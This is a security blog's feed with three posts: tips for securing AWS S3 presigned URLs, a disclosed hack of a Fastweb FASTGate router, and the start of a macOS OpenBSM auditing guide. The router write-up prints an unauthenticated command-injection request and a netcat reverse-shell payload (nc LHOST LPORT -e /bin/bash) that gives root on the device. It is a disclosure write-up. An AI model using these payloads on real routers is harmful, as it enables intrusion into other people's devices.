Jekyll2023-07-05T12:02:51+00:00https://insecurity.blog/feed.xml(in)securityYet another blog with some security related posts.Securing your Amazon AWS S3 presigned URLs, tips and tricks2021-03-06T17:20:24+00:002021-03-06T17:20:24+00:00https://insecurity.blog/2021/03/06/securing-amazon-s3-presigned-urls<h1 id="abstract">Abstract</h1>
<p>With the advent of the cloud, <a href="https://aws.amazon.com/s3/">Amazon AWS S3</a>
(Simple Storage Service) has become widely used in most companies to store
objects, files or more generally data in a persistent and easily accessible way.</p>
<p>AWS S3 buckets can be (and in fact, are) integrated in almost any modern
infrastructure: from mobile applications where the S3 bucket can be queried
directly, to web applications where it could be proxies behind a back end,
to micro-services that use them to store processed documents, logs, or other
data for both short term and long term storage.</p>
<p>If you use S3 in your infrastructure, you will probably find yourself in the
situation where you want to return a file from an S3 bucket to the user, or
where you need your user to safely upload a file into the S3 bucket. To make
this integration easier and safer, S3 provides the so-called
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html">presigned URLs</a>.</p>
<p>This blog post will briefly explain what a presigned URL is and will summarize
the security considerations and tips I ended up writing after several time
spent playing with them and threat modeling user’s file upload features.</p>
<p>You will not find ready to copy-paste policy configuration for your S3 bucket
or detailed explanation on how to secure your bucket, what you will find
here is a list of good-to-know and good-to-remember considerations that you
should keep in mind if your goal is to use presigned URLs to store object into
an S3 bucket in a safe(r) way.</p>
<h4 id="disclaimer">Disclaimer</h4>
<p>This is the result of my experience with S3 buckets, not an absolute truth.
If you notice any error or inaccuracy <a href="mailto:santoru@pm.me">report it to me</a>,
I’ll learn something new and I can make the article more accurate.</p>
<h2 id="presigned-urls-what-are-these-and-some-use-cases">Presigned URLs: What are these and some use cases</h2>
<p>Before starting with the list of tips, let’s briefly discuss what the general
use case for presigned URLs is in a generic modern environment.</p>
<p>Let’s say you host some files on an S3 bucket and you need to expose these to
a user but you don’t want to setup the bucket as open, also let’s say you want
to keep some control on the access to these files, for example by limiting the
time-frame where the files can be accessed by the user.</p>
<p>Now let’s say you create a feature that involves the user uploading a document
and that you want to store this file into an S3 bucket.
How do you handle this in a secure way?</p>
<p>Here’s were presigned URLs come in handy: AWS S3 provides an easy way to share
S3 objects by creating signed (with owner credentials) links to access them.
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html">Amazon’s documentation</a>
explain this concept in a clear way:</p>
<blockquote>
<p>All objects by default are <strong>private</strong>. Only the object owner has permission
to access these objects. However, the object owner can <strong>optionally share</strong>
objects with others by creating a presigned URL, using their own security
credentials, to grant <strong>time-limited permission</strong> to download the objects.</p>
</blockquote>
<p>So here’s the deal, unless you configure your bucket differently (for example
to be read-accessible to everybody) your files are private but can be shared by
creating a time-limited permission in the form of a link, neat!</p>
<p>But how does a presigned URL look like? Let’s go with an example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://yourbucket.s3.eu-west-1.amazonaws.com/yourfile.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=some-aws-credential-to-identify-the-signer&X-Amz-Date=timestamp-of-generation&X-Amz-Expires=validity-from-generation-timestamp&X-Amz-Signature=4709da5a980e6abc4ab7284c1b6aa9e624f388e08f6a7609e28e5041a43e5dad&X-Amz-SignedHeaders=host
</code></pre></div></div>
<p>or in a more user-friendly format:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://yourbucket.s3.eu-west-1.amazonaws.com/pdf/yourfile.pdf ?
X-Amz-Algorithm = AWS4-HMAC-SHA256 &
X-Amz-Credential = some-aws-credential-to-identify-the-signer &
X-Amz-Date = timestamp-of-generation &
X-Amz-Expires = validity-from-generation-timestamp &
X-Amz-Signature = 4709da5a980e6abc4ab7284c1b6aa9e624f388e08f6a7609e28e5041a43e5dad &
X-Amz-SignedHeaders = host
</code></pre></div></div>
<p>Most of these parameters are configured or generated by using the AWS SDK
functionalities but how to create a presigned URL is not the goal of this
article. What it’s important to remember is that S3 will try to compute the
same signature for the specified credentials, including into its calculation
the optional <code class="language-plaintext highlighter-rouge">SignedHeaders</code> parameter and checking if the signature is valid
and if the link is not expired yet.</p>
<p>Something else that is important to remember is that when you create a presigned
URL for an object (for both scenarios where you want to upload or download a file)
you <strong>must provide to the SDK valid credentials</strong> to generate a valid
signature. This means that the presigned URL will be authenticated to access the
resource “on behalf of” the credentials you used to generate it.</p>
<p>Said that, the ideal setup would usually be to have a dedicated back end service
with dedicated (and restricted) credentials to generate presigned URLs for
specific resources and returning these to the front end or to the client,
where can be directly used to <strong>read</strong> or <strong>write</strong> the “signed” resource (Fig. 1).</p>
<figure class="image">
<img class="full-width" src="/img/s3/upload_scenario.png" alt="Figure 1 - A very simplified schema that shows how presigned URLs are used" />
<figcaption>
Figure 1 - A very simplified schema that shows how presigned URLs are used
</figcaption>
</figure>
<p>But let’s go next with the recommendations, not sorted in any specific order.</p>
<h2 id="1-presigned-urls-can-be-reused">1. Presigned URLs can be reused</h2>
<p>Yes, these URLs are not one-shot and the only thing that can limit temporally
a presigned URL is the <code class="language-plaintext highlighter-rouge">X-AMZ-Expires</code> parameter: once the presigned URL is
generated, it will be valid for an unlimited amount of times before it expires.
This means that if you grant read access to an object in a bucket for 1 day,
anyone with the link can access that object for the whole day, multiple times.
This also means that if you grant write access via a presigned URL to a bucket
for 1 day, anyone with the URL could upload whatever file they want, any time
they want.</p>
<h2 id="2-anyone-can-use-a-valid-presigned-url">2. Anyone can use a valid presigned URL</h2>
<p>Just to make sure this is clear: if you generate a presigned URL anyone can use
this, the user generating this link could use it to <em>phish</em> another user
and let them upload an arbitrary file.
So be sure you threat model properly your feature to avoid logic
vulnerabilities. If your service is generating a presigned URL valid for 10
minutes to upload a file, that URL can be used by anyone, unless you
validate the request in a different way; A solution could be adding an
additional signed header while building the presigned URL in a way that
only allowed clients can perform the request (Check point #8).</p>
<h2 id="3-presigned-urls-do-not-provide-authentication">3. Presigned URLs do not provide authentication</h2>
<p>When your service returns a presigned URL to a user, the user will consume it
to read / upload an object directly from / into the S3 bucket. This means
that your service will not handle that file directly before it’s uploaded.
This also means that your authentication layer will not usually be in place,
unless your s3 bucket has some authentication proxy in front of it.
In other words, presigned URLs only provide authorization to access a specific
object in a bucket (and eventually impose some restrictions to that access)
but the authentication is implicitly connected to the IAM role that
generates the presigned link. In your ideal setup this means that your service
will use its credentials to generate a presigned URL that the S3 bucket
will match to the service while checking the signature, not to the client.
If you want to provide authentication to the actual user consuming the link,
you need to implement this by yourself while generating the presigned link,
for example by storing the presigned link along with the user identifier that
requested it.</p>
<p>For file uploads, another solution could be to generate a random UUID as
filename for the object to be uploaded and store this UUID with the user
identifier on your database, otherwise you can append the user identifier
directly to the random UUID on the filename.</p>
<h2 id="4-do-not-give-full-access-to-the-bucket-to-the-service-creating-presigned-urls">4. Do not give full access to the bucket to the service creating presigned URLs</h2>
<p>If the task of your back end service is to only upload files into a bucket,
you probably don’t need to configure an IAM role that is capable of reading
all the objects in the bucket or to delete them, and you probably don’t
want this to happen too, so keep in mind to stick to the principle of least
privilege and only grant the necessary permissions when configuring the
IAM role.</p>
<p>Having your back-end service handling credentials that can do more than you want
is a big risk for your infrastructure security and your users: let’s say you
configure your service to use bucket’s owner credentials, what happen if the
keys get leaked or if a malicious actor can access them? You got this right,
they have full access to the bucket and to its content. Now let’s say your
service is configured with an IAM role that can only read files under a specific
folder, you see the improvements? The attacker can still read uploaded
files, and this is still bad, but definitely better than having the attacker
deleting all the files, or replacing some with malicious ones.</p>
<p>Keep also in mind that credentials or keys shouldn’t be hard coded,
there are several alternative to safely store secret and retrieve them
when needed, and AWS itself has also a specific service to do that, called
<a href="https://aws.amazon.com/secrets-manager/">AWS Secrets Manager</a>, so don’t
hard-code credentials and secret.</p>
<h2 id="5-enable-server-access-logging-on-your-exposed-s3-bucket">5. Enable server access logging on your exposed S3 bucket</h2>
<p>This is a generic recommendation that applies even if you don’t use presigned
URL and should be followed for any S3 bucket, the explanation of this is clearly
reported on the <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html">Server Logs</a>
page from AWS:</p>
<blockquote>
<p>Server access logging provides detailed records for the requests that are
made to a bucket. Server access logs are useful for many applications.
For example, access log information can be useful in security and access
audits. It can also help you learn about your customer base and understand
your Amazon S3 bill.</p>
</blockquote>
<p>This is not enabled by default, as mentioned on the
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html">relevant web page</a>:</p>
<blockquote>
<p>By default, Amazon S3 doesn’t collect server access logs.</p>
</blockquote>
<h2 id="6-path-traversal-can-be-a-thing-sanitize-that-filename">6. Path traversal can be a thing, sanitize that filename</h2>
<p>Or even better, use a random UUID.
Depending on your application’s design, if the user can control the filename of
the file being uploaded, you could be exposed to some threats like path
traversal attacks, as shown
<a href="https://hackerone.com/reports/94087">here</a> or
<a href="https://hackerone.com/reports/254200">here</a>. To avoid this, you should sanitize
that filename before using it to generate the presigned URL. Another good
solution would be to generate a random UUID and use that as a filename,
completely discarding the user controlled input.</p>
<h2 id="7-be-careful-with-file-size-theres-no-built-in-functionality-to-limit-it">7. Be careful with file-size, there’s no built in functionality to limit it</h2>
<p>With presigned URL,
<a href="https://github.com/aws/aws-sdk-net/issues/424">you don’t have an easy way to limit file size</a>
, and this can be a problem. S3 has a cap of 5GB per request so you shouldn’t
end up with a huge file on your disk but based on your file processing
algorithm and your expectation on the file size, 5GB could be a bit more
than you expect.</p>
<p>Presigned URLs do not allow to configure a max file size with an easy-to-set
parameter but there are some workaround to this, as you can see from #8 or #9.</p>
<p>According to your infrastructure design, this could even not be a problem (but
it’s still good to keep this in mind).</p>
<h2 id="8-using-signed-headers-you-can-add-a-files-hash-and-avoid-uncontrolled-file-uploads">8. Using signed headers, you can add a file’s hash and avoid uncontrolled file uploads</h2>
<p>As said before, once a presigned URL is generated, you don’t have control over
who can upload a file, but you can mitigated this by generating a presigned URL
that checks for the file’s md5 hash, how? By using <code class="language-plaintext highlighter-rouge">X-Amz-SignedHeaders</code>.</p>
<p>By specifying the <code class="language-plaintext highlighter-rouge">Content-MD5</code> header while generating the presigned URL, your
service can enforce the presigned URL to be valid only if the specified value
for this header is the same from the one specified, and the one received by the
user while uploading a file. This way you can generate a presigned URL for a
specific file, not for a generic one (Fig. 2).</p>
<figure class="image">
<img class="full-width" src="/img/s3/upload_md5.png" alt="Figure 2 - Presigned URL generation by enforcing the md5 hash" />
<figcaption>
Figure 2 - Presigned URL generation by enforcing the md5 hash
</figcaption>
</figure>
<p>Keep in mind that this will not protect from a customer that want to upload
an arbitrary file, as the customer will be able to compute the hash and
request the presigned link for this file, but will protect from scenarios
where the user wants to use a presigned link and let someone else uploading
an arbitrary files (for example in a phishing scenario).</p>
<p>You can use <code class="language-plaintext highlighter-rouge">SignedHeaders</code> also to enforce additional controls, for example on
file size by signing the <code class="language-plaintext highlighter-rouge">content-length</code> header.</p>
<h2 id="9-you-could-use-post-rather-than-put">9. You could use POST rather than PUT</h2>
<p>Amazon’s AWS S3 documentation
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/PresignedUrlUploadObject.html">mention that</a>:</p>
<blockquote>
<p>When you create a presigned URL, you must provide your security
credentials and then specify a bucket name, an object key,
an HTTP method (<strong>PUT for uploading objects</strong>), and an expiration date and time.
This is the default situation, but using PUT method you don’t have some controls
that you could get with POST, why? Because of
<a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html">POST Policies</a>.</p>
</blockquote>
<p>A POST Policy is a sequence of rules (called conditions) that must be met when
performing a POST request to an S3 bucket in order for this request to success.
You can configure these directly from the AWS console.</p>
<p>One benefit, over the others, of using a POST policy is that the
<a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html#sigv4-PolicyConditions">list of conditions</a>
contains <code class="language-plaintext highlighter-rouge">content-length-range</code>, which can be used to easily solve the
consideration #7.</p>
<p>But can I still use PUT?</p>
<p>It is still not clear to me what’s the best solution is between POST and PUT, I
saw both used in productions and I think that depends a lot on the specific use
case: presigned URL uses PUT by default, and you don’t need to write a policy,
but you loose flexibility. On the other hands, POST give you more control but
is less straightforward to implement in my opinion.
Amazon seems to suggest using POST policy,
<a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-post-example.html">considering this article where they show an example of browser-based upload</a>.</p>
<h2 id="10-keep-the-expiration-of-the-presigned-url-low-especially-for-file-write">10. Keep the expiration of the presigned URL low, especially for file write</h2>
<p>This is self-explanatory, keep the presigned URL as short-lived as you can.
Most of the time, presigned URL are used to download a single file from a
bucket, and then are discarded. In most scenarios, your front end does not even
keep track of the link itself and, once the file is downloaded, is discarded.</p>
<p>For file upload the situation is similar: if your front end is taking care of
requesting the presigned link and uploading the file, this shouldn’t take
long. If it’s taking longer than expected, the presigned link could be requested
again. There’s no need to keep an upload link valid for hours.</p>
<h2 id="11-dont-forget-to-configure-cors">11. Don’t forget to configure CORS</h2>
<p>If your front end is a web application served in a browser, you must configure
CORS (Cross Origin Resource Sharing) otherwise your client’s requests will fail
due to browser’s protection. CORS is intended to protect your customers from
malicious website that could perform actions on behalf of the customer.</p>
<p>Even if your policies and permissions still apply when you configure
CORS, blocking unauthorized websites to perform cross-origin requests to your
bucket is a must do.</p>
<p>Via the CORS configuration panel you can configure your allowed domains on the
<code class="language-plaintext highlighter-rouge">AllowedOrigin</code> object. Keep in mind the principle of least privilege also when
configuring CORS: only white-list websites that you have control over.</p>
<p>If you want to know more about CORS and how to apply it, Amazon provides a
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/cors.html">great documentation</a>
on the topic with lot of examples and I suggest you to read it.</p>
<p>If your front end is a mobile application, then CORS won’t apply, as CORS is
enforced by browsers to avoid cross-origin and mobile applications are not
considered a web origin (and are not susceptible to attacks that leverage
cross-origin requests). In this case you still want to ensure that websites
can’t access your bucket and you can do this by ensuring that your CORS is
enabled without any allowed origin or is disabled. If CORS is disabled,
browsers will not perform any request.</p>
<h1 id="conclusion">Conclusion</h1>
<p>With this blog post I hope that I gave you an idea about what to keep in mind
while designing a user upload feature with presigned URLs. As you can see,
depending on your threat model, the things to keep in mind can be different.</p>
<p>I’m sure there are other valid recommendations that you can suggest, as I don’t
think I cover 100% of the things.</p>
<p>File uploads can be very dangerous functionalities and the risks involved are
multiple. Even if you follow these recommendation, you don’t know if the file
being uploaded from a user is malicious or not, and processing it could have
unwanted results. That’s why it is suggested to process untrusted files in a
restricted environment.</p>
<p>Finally, AWS provides lot of documentation on S3 and how to secure it further,
I suggest you to read
<a href="https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/">this document</a>
if you’d like to know more about how to secure files in S3 buckets.</p>
<p>If you enjoyed this post, you can
<a href="https://twitter.com/santoru_">follow me on Twitter</a>
or
<a href="https://github.com/santoru">check out my GitHub profile</a></p>
<h1 id="references">References</h1>
<ul>
<li><a href="https://aws.amazon.com/s3/" target="_blank">Amazon AWS S3</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html" target="_blank">AWS Docs | Sharing an object with a presigned URL</a></li>
<li><a href="https://aws.amazon.com/secrets-manager/" target="_blank">Amazon AWS Secret Manager</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html" target="_blank">AWS Docs | Logging requests using server access logging</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html" target="_blank">AWS Docs | Enabling Amazon S3 server access logging</a></li>
<li><a href="https://hackerone.com/reports/94087" target="_blank">Arbitrary read on s3://shopify-delivery-app-storage/files</a></li>
<li><a href="https://hackerone.com/reports/254200" target="_blank">Escaping images directory in S3 bucket when saving new avatar, using Path Traversal in filename</a></li>
<li><a href="https://github.com/aws/aws-sdk-net/issues/424" target="_blank">Limit an upload filesize with a Pre-signed URL</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/PresignedUrlUploadObject.html" target="_blank">AWS Docs | Uploading objects using presigned URLs</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html" target="_blank">AWS Docs | Creating a POST Policy</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-HTTPPOSTConstructPolicy.html#sigv4-PolicyConditions" target="_blank">AWS Docs | Creating a POST Policy - Conditions</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-post-example.html" target="_blank">AWS Docs | Example: Browser-Based Upload using HTTP POST (Using AWS Signature Version 4)</a></li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/cors.html" target="_blank">AWS Docs | Using cross-origin resource sharing (CORS)</a></li>
<li><a href="https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/" target="_blank">How can I secure the files in my Amazon S3 bucket?</a></li>
<li><a href="https://twitter.com/santoru_" target="_blank">santoru_ | Twitter</a></li>
<li><a href="https://github.com/santoru" target="_blank">santoru | GitHub</a></li>
</ul>santoruAbstract With the advent of the cloud, Amazon AWS S3 (Simple Storage Service) has become widely used in most companies to store objects, files or more generally data in a persistent and easily accessible way.Hacking into a FASTGate router with a command injection (and a bunch of other vulnerabilities)2018-10-13T21:14:42+00:002018-10-13T21:14:42+00:00https://insecurity.blog/2018/10/13/hacking-into-a-fastgate-router<p>This blog post describes how I found a couple of vulnerabilities in the FASTGate modem/router provided by Fastweb, an Italian telecommunication company, to its clients. Thanks to these vulnerabilities I was able to bypass the authentication layer as well as execute arbitrary code via command injection and get a reverse shell back to the router.
All vulnerabilities have been disclosed to Fastweb and are fixed in newer versions of the firmware.</p>
<h2 id="fastgate-the-latest-generation-modem-from-fastweb">FASTGate: the latest generation modem from Fastweb</h2>
<p>Fastweb<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup> is an Italian telecommunications company that provides internet services. Since around march 2017 the company started to ship a new modem to its client: the FASTGate<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>.
Working as a penetration tester, and having the possibility to test it out, I started to analyze its web interface in order to find some vulnerabilities that could give me some unintended access to it. Goal of the night: popping up a shell!\
First step was to set up Burp Suite as a proxy and navigate a bit through the webpages to save some request and response.
The first screen I got was the login panel, as shown in figure 1.</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/login.png" alt="Figure 1 - Login panel" />
<figcaption>
Figure 1 - Login panel
</figcaption>
</figure>
<h3 id="broken-authentication-layer">Broken authentication layer</h3>
<p>I logged in and started to browse some pages and execute actions in order to understand how requests were handled. The first thing I noticed was that the login request did not return any cookie nor any token to the client and this made me suspicious: did they implement some authentication at all? <br />
They didn’t.</p>
<p>What I noticed was that the web application was simply sending AJAX requests to a cgi binary, called <code class="language-plaintext highlighter-rouge">status.cgi</code>, using a parameter called <code class="language-plaintext highlighter-rouge">nvget</code> to specify the action.
For example, the following GET request was enough to list all devices connected to the router, even in the past, with their assigned IP, their MAC address and their hostname:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET http://192.168.1.254/status.cgi?nvget=pc_list
</code></pre></div></div>
<p>Just to have a nice output to show, I developed a python script that parses the json response and display it:</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/userenum.png" alt="Figure 2 - Devices enumeration" />
<figcaption>
Figure 2 - Devices enumeration
</figcaption>
</figure>
<h3 id="unauthenticated-command-injection-in-login-page">Unauthenticated command injection in login page</h3>
<p>With this trivial <em>authentication bypass</em> via the <code class="language-plaintext highlighter-rouge">status.cgi</code> binary, I went back to the login request and started to manually fuzz both the username and password fields. After few tests I noticed that the response of the server, after putting a single quotation mark into the password field, printed an interesting line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.0 200 OK
sh: syntax error: unterminated quoted string
Content-type: text/html
</code></pre></div></div>
<p>Uhm.. what? Am I dreaming? Is my controlled input really used to execute a shell command with no sanitization at all?
I wanted to see if I could actually run some commands, so I tried executing <code class="language-plaintext highlighter-rouge">ping</code> which is usually a command installed on any distribution:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /status.cgi?_=1512070412178&cmd=3&nvget=login_confirm&password='$(ping)'&remember_me=1&username=admin HTTP/1.1
</code></pre></div></div>
<p>The response was the confirmation I was looking for:</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/ping.png" alt="Figure 3 - Ping command" />
<figcaption>
Figure 3 - Ping command
</figcaption>
</figure>
<p>As shown, I can successfully send arbitrary command by adding to the password input the text <code class="language-plaintext highlighter-rouge">'$(`command`)'</code>.
The impact of this vulnerability is full code execution on the router, but it’s not clear what privileges I’m running with, having a shell to quickly interact with the router would be ideal!</p>
<h4 id="getting-the-reverse-shell">Getting the reverse shell</h4>
<p>The command execution is cool, but can we go further? Can we get a real shell into the system? Of course we can! After some enumeration done via the command injection, I noticed that the router shipped several <code class="language-plaintext highlighter-rouge">netcat</code> binaries, one of which was luckily compiled with support to the <code class="language-plaintext highlighter-rouge">-e</code> parameter that, quoting the man page, <code class="language-plaintext highlighter-rouge">execute external program after accepting a connection or making connection</code>.
Let’s use this <code class="language-plaintext highlighter-rouge">nc</code> binary to run a reverse shell:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /status.cgi?cmd=3&nvget=login_confirm&password=AA'$(`/statusapi/usr/bin/nc%20LHOST%20LPORT%20-e%20/bin/bash`)AAremember_me=1&username=admin HTTP/1.1
</code></pre></div></div>
<p>This was enough to get a full reverse shell into the system, and guess what? The process is running as <code class="language-plaintext highlighter-rouge">root</code> so we get full access to the device.</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/poc.png" alt="Figure 4 - Exploit executed to get a shell" />
<figcaption>
Figure 4 - Exploit executed to get a shell
</figcaption>
</figure>
<h2 id="conclusions">Conclusions</h2>
<p>For documentation purpose, the vulnerable software version that I tested is the <code class="language-plaintext highlighter-rouge">v1.0.1b</code>, with firmware version <code class="language-plaintext highlighter-rouge">0.00.47_FW_200_Askey2017-05-17 17:31:59</code>.<br />
It must be noted that in order to exploit the vulnerability the attacker must be authenticated to the Wi-Fi network, as the admin interface is exposed on the internal network.</p>
<figure class="image">
<img class="full-width" src="/img/fastgate/version.png" alt="Figure 5 - Vulnerable version" />
<figcaption>
Figure 5 - Vulnerable version
</figcaption>
</figure>
<p>The communication with Fastweb didn’t go very smooth. I tried to contact them multiple time to report this vulnerability but after an initial ack they stopped any communication with me.
Few weeks after my emails, they released a new firmware version that addressed most of the vulnerabilities:</p>
<ul>
<li>Login request now returns a session token that it is used to authenticate all requests to <code class="language-plaintext highlighter-rouge">status.cgi</code>, so it seems that they fixed the trivial “bypass”.</li>
<li>They initially added a CSRF protection by setting a cookie called <code class="language-plaintext highlighter-rouge">XSRF-TOKEN</code>: when sending a request, the web application send both the cookie and a <code class="language-plaintext highlighter-rouge">X-XSRF-TOKEN</code> header with the same value. There’s no actual validation on the token value, no matter what the user decide to sent via these two headers, if the cookie matches the token value, the server will accept it.</li>
<li>The command injection was still present in a bunch of updates, but was eventually fixed.</li>
</ul>
<p>At the time, they didn’t have any responsible disclosure program nor any specific security contact, but they did create one shortly after my first email. The Responsible Disclosure<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup> webpage they created has an Hall-of-Fame, but I was not mentioned there.</p>
<h2 id="bonus-mini_httpd-v127--thttpd-v227-buffer-overflow">Bonus: mini_httpd v1.27 / thttpd v2.27 buffer overflow</h2>
<p>One of the first things I noticed reading the response from the router was the <code class="language-plaintext highlighter-rouge">Server</code> header: <code class="language-plaintext highlighter-rouge">mini_httpd/1.27 07Mar2017</code>.<br />
According to the developer’s website of <code class="language-plaintext highlighter-rouge">mini_httpd</code><sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup>, it seemed to be the latest available version at the time and I couldn’t find any public information about known vulnerabilities on it.</p>
<p>Since the source code was available, I started to do some analysis and I noticed a trivial buffer overflow in the <code class="language-plaintext highlighter-rouge">htpasswd.c</code> file, which turned out to be a custom and simplified version of the original <em>htpasswd</em> utility developed for the Apache HTTP Server and used to<code class="language-plaintext highlighter-rouge">'create and update the flat-files used to store usernames and password for basic authentication of HTTP users</code>.<br />
The simplified version developed by ACME Laboratories had a buffer overflow vulnerability since the username parameter provided through the command line interface was copied into a buffer without any bound check. The vulnerability could be exploited to execute malicious payloads if the utility can be used remotely to set up, for example, an account: In this case an attacker can craft an exploit and gain code execution into the vulnerable system.<br />
After disclosing the vulnerability to the maintainer of the web-server an update that fixed the vulnerability was released through the developer’s website.</p>
<h3 id="disclosure-timeline-of-the-buffer-overflow">Disclosure timeline of the Buffer Overflow</h3>
<ul>
<li>01 December 2017 - Contacted the developer to ask how to report security findings</li>
<li>12 December 2017 - Sent the details of the vulnerability to the developer</li>
<li>13 December 2017 - Developer acknowledged the vulnerability</li>
<li>13 December 2017 - CVE assigned: <em>CVE-2017-17663</em></li>
<li>04 February 2018 - Update released for mini_httpd & thttpd and <a href="https://acme.com/updates/archive/199.html">advisory published</a> for the vulnerability.</li>
</ul>
<hr />
<h2 id="footnotes">Footnotes</h2>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:1" role="doc-endnote">
<p><a href="https://www.fastweb.it/">Fastweb S.p.A.</a> <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:2" role="doc-endnote">
<p><a href="https://www.fastweb.it/myfastweb/assistenza/guide/FASTGate/">FASTGate</a> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:3" role="doc-endnote">
<p><a href="https://www.fastweb.it/corporate/responsible-disclosure/">Fastweb Responsible Disclosure</a> <a href="#fnref:3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:4" role="doc-endnote">
<p><a href="https://acme.com/software/mini_httpd/">mini_httpd - small HTTP server</a> <a href="#fnref:4" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>santoruThis blog post describes how I found a couple of vulnerabilities in the FASTGate modem/router provided by Fastweb, an Italian telecommunication company, to its clients. Thanks to these vulnerabilities I was able to bypass the authentication layer as well as execute arbitrary code via command injection and get a reverse shell back to the router. All vulnerabilities have been disclosed to Fastweb and are fixed in newer versions of the firmware.Real-time auditing on macOS with OpenBSM2017-07-02T20:05:24+00:002017-07-02T20:05:24+00:00https://insecurity.blog/2017/07/02/mac-os-real-time-auditing<h2 id="introduction">Introduction</h2>
<p>Goal of this blog post is to explain how to use OpenBSM library to perform live audit on macOS to detect which files are open and by who.
Everyday we install some program, or application, on our computer and they can basically have access to the most of files.
Real-time auditing can be useful for a lot of reasons: maybe you’re just curious to see which files are opened by some applications or if some malicious process are reading your personal documents, or maybe opening your photos. Maybe you are not curious but you just want to detect possible ransom-ware activity to stop them.<br />
The scenarios are infinite.<br />
Another common scenario is that you can use real-time auditing to build and run your personal Host-Based IDS by checking modifications and accesses to sensible files.</p>
<p>In this blog post I will just explain how this auditing is possible thanks to OpenBSM, giving the reader some others resources for further “investigation” and publishing a small proof-of-concept of a basic implementation.</p>
<p>If you spot a mistake, I’ll be happy to fix it, just send an <a href="mailto:santoru@pm.me">email to me</a>.</p>
<h2 id="openbsm">OpenBSM</h2>
<p>According to the Trusted BSD project, OpenBSM is an open-source implementation of Sun’s BSM (Basic Security Module) event auditing file format and API originally created for Apple Computer by McAfee Research.</p>
<p>This implementation provides a set of system calls and library interfaces for <strong>managing audit records</strong> but includes also some command line tools.</p>
<p>As we can see from the configuration files located in <span class="mon">/etc/security</span>, by default macOS use two flags, <span class="mon">lo</span> and <span class="mon">aa</span>, to logs Login/Logout (lo) and Authorization/Authentication (aa) events on the <span class="mon"><strong>/var/audit/</strong></span> directory.</p>
<pre class="highlight">
$ cat /etc/security/audit_control
#
# $P4: //depot/projects/trustedbsd/openbsm/etc/audit_control#8 $
#
dir:/var/audit
<b>flags:lo,aa</b>
minfree:5
naflags:lo,aa
policy:cnt,argv
filesz:2M
expire-after:10M
superuser-set-sflags-mask:has_authenticated,has_console_access
superuser-clear-sflags-mask:has_authenticated,has_console_access
member-set-sflags-mask:
member-clear-sflags-mask:has_authenticated
</pre>
<p>We can have some information about these flags, and about all available flags, from another file located on the same directory:</p>
<pre class="highlight">
$ cat /etc/security/audit_class
#
# $P4: //depot/projects/trustedbsd/openbsm/etc/audit_class#6 $
#
0x00000000:no:invalid class
0x00000001:fr:file read
0x00000002:fw:file write
0x00000004:fa:file attribute access
0x00000008:fm:file attribute modify
0x00000010:fc:file create
0x00000020:fd:file delete
0x00000040:cl:file close
0x00000080:pc:process
0x00000100:nt:network
0x00000200:ip:ipc
0x00000400:na:non attributable
0x00000800:ad:administrative
<b>0x00001000:lo:login_logout
0x00002000:aa:authentication and authorization</b>
0x00004000:ap:application
0x20000000:io:ioctl
0x40000000:ex:exec
0x80000000:ot:miscellaneous
0xffffffff:all:all flags set
</pre>
<p>Since we want to monitor which files are accessed by a process, we can build our own audit program using the functions provided from OpenBSM and log, or display, only relevant information.
To audit only some information we can then specify one or more of the flags above and, for example, if we want to log which files are open to be read, we can use the flag <strong>“fr”</strong> identified by the value <strong>0x00000001</strong>.</p>
<p>The Basic Security Module Library provides some functions to read these events and automatically parse them.
In details, we have 4 functions to manipulate and interact with events:</p>
<h4 id="au_read_rec">au_read_rec()</h4>
